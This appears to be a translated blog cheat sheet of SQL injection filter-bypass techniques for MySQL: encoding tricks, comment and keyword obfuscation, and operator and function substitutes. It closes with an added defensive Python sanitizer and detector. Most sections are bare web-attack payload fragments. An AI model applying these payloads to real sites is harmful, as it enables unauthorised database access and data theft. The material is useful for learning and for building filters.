SQL injection: techniques for bypassing common filters


Reference links: https://blog.csdn.net/huanghelouzi/article/details/82995313

                 https://www.cnblogs.com/vincy99/p/9642882.html

Table of contents:

  1. Case bypass
  2. Double-write bypass
  3. Inline comment bypass
  4. Encoding bypass
  5. <> bypass
  6. Comment symbol bypass
  7. Space bypass
  8. or / and bypass
  9. Equal sign (=) bypass
  10. Single quote bypass
  11. Comma bypass
  12. Filtered function bypass

0x01 Case bypass

UniOn SeleCt

0x02 Double-write bypass

ununionion seselectlect

0x03 Inline comment bypass

MySQL treats the contents of an inline comment /*!...*/ as a statement and executes it, while other databases treat it as an ordinary comment and ignore it. A filter that strips or ignores comments therefore misses the keyword.

and /*!select*/ 1,2

0x04 Encoding bypass

Hex bypass:

select * from users where username = test1;
select * from users where username = 0x7465737431;

Double URL-encoding of the whole keyword:

1+and+1=2
1+%25%36%31%25%36%65%25%36%34+1=2

Unicode encoding of some symbols:

Single quote      => %u0037 %u02b9
Space             => %u0020 %uff00
Left parenthesis  => %u0028 %uff08
Right parenthesis => %u0029 %uff09

0x05 <> bypass

Some sites filter the "<>" symbols by simply deleting them, so the keyword is reassembled after filtering:

unio<>n sel<>ect

0x06 Comment symbol bypass

union/**/select

0x07 Space bypass

Substitutes for a space:
/**/
%20  %09  ()  newline (URL-encoded %0A)  ` (the backtick key above Tab)  two spaces

0x08 or / and bypass

and = &&
or = ||

0x09 Equal sign (=) bypass

like without wildcards behaves exactly like =, so it can be used to bypass a filter on =;

rlike is used the same way as like above: without wildcards it is equivalent to =;

regexp: MySQL's REGEXP operator performs regular-expression matching;

<> is equivalent to !=; putting a ! in front negates it, so the result is an equal sign.

?id=1 or 1 like 1
?id=1 or 1 rlike 1
?id=1 or 1 regexp 1
?id=1 or !(1 <> 1)   or   1 !(<>) 1

0x10 Single quote bypass

Wide character

# when single quotes are filtered
%bf%27  %df%27  %aa%27

Hexadecimal

'user' => 0x7573657273

0x11 Comma bypass

In blind injection use "from n1 for n2", where n1 is the position at which reading starts and n2 is the length of the substring to read:

select substr("string",1,3);
equivalent to select substr("string" from 1 for 3);

Use the join keyword to bypass:

union select 1,2,3
equivalent to union select * from (select 1)a join (select 2)b join(select 3)c

Use the offset keyword:

Applies when the comma in limit is filtered:
limit 2,1 is equivalent to limit 1 offset 2

0x12 Filtered function bypass

sleep() --> benchmark()

and sleep(1)
equivalent to and benchmark(1000000000,1)

group_concat() --> concat_ws()

select group_concat("str1","str2");
equivalent to select concat_ws(",","str1","str2");
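Every trick above targets a filter that matches the raw request bytes once. The following added example (not part of the original post; the blacklist and function names are hypothetical) shows the defender's counterpart: a hypothetical one-pass sanitizer, the same sanitizer iterated to a fixed point (closing the double-write hole), and a canonicalizer that undoes double URL encoding, case variation and comment tricks before any keyword check runs.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical one-pass blacklist: the kind of filter every trick on this
# page is aimed at.
BLACKLIST = ("union", "select", "and", "or", "<>")

def naive_sanitize(s: str) -> str:
    """Single, case-sensitive removal pass; what the bypasses defeat."""
    for token in BLACKLIST:
        s = s.replace(token, "")
    return s

def sanitize_to_fixed_point(s: str) -> str:
    """Re-apply the filter until nothing changes. This closes the
    double-write hole: ununionion -> union -> ''."""
    prev = None
    while prev != s:
        prev, s = s, naive_sanitize(s)
    return s

def canonicalize(s: str) -> str:
    """Reduce a request parameter to what the MySQL parser would see."""
    # Double URL encoding: decode until the string stops changing.
    prev = None
    while prev != s:
        prev, s = s, unquote_plus(s)
    s = s.lower()                                   # UniOn SeleCt
    # /*!select*/ (optionally /*!50000select*/) is executed by MySQL, so
    # its body is kept; every other /* */ comment is just whitespace.
    s = re.sub(r"/\*!\d{0,5}(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    # Tab, newline, vertical tab and form feed all separate tokens.
    return re.sub(r"\s+", " ", s).strip()

OP = r"(?:\b(?:or|and)\b|\|\||&&)"                 # and = &&, or = ||
CMP = r"(?:=|<>|!=|\blike\b|\brlike\b|\bregexp\b)"  # '=' substitutes
PATTERNS = (
    re.compile(r"\bunion\b.*\bselect\b"),
    re.compile(rf"{OP}\s*\S+?\s*{CMP}\s*\S+"),
)

def looks_like_injection(param: str) -> bool:
    """Run the checks on the canonical form, not on the raw bytes. Feed it
    the string *after* any stripping the application itself does (e.g.
    naive_sanitize), since that is what actually reaches the database."""
    c = canonicalize(param)
    return any(p.search(c) for p in PATTERNS)
```

The <> trick is only caught when the check runs on the sanitizer's output, which is why the detection step belongs after, not before, any stripping the application performs.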


Source: www.cnblogs.com/-chenxs/p/11618846.html